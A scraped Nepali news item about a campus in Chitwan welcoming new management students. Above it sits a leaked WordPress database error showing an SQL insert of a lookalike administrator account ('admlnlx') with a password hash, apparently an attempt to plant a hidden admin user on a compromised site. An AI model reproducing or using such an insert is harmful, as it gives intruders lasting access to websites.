WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bfjc8nPPhCFmMjV.Im/3Zy7D5rsq1p1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:38:37', '', 'admlnlx', 'admlnlx')
चितवन,मंसिर २६-
शर्वशान्ति क्याम्पस कुरिनटारमा आज एक कार्यक्रमका विच नयां विद्यार्थीलाई स्वागत गरिएको छ । व्यवस्थापन संकाय अन्तरगतको पहिलो बर्षमा अध्ययन गर्न आएका बिद्यार्थीहरुलाई स्वागत गरिएको हो ।
क्याम्पस निमित्त प्रमुख प्रकास पौडेलको प्रमुख आतिथ्य तथा तेश्रो बर्षमा अध्ययनरत छात्र प्रविण कंडेलको सभापतित्वमा स्वागत कार्यक्रम सम्पन्न गरिएको हो ।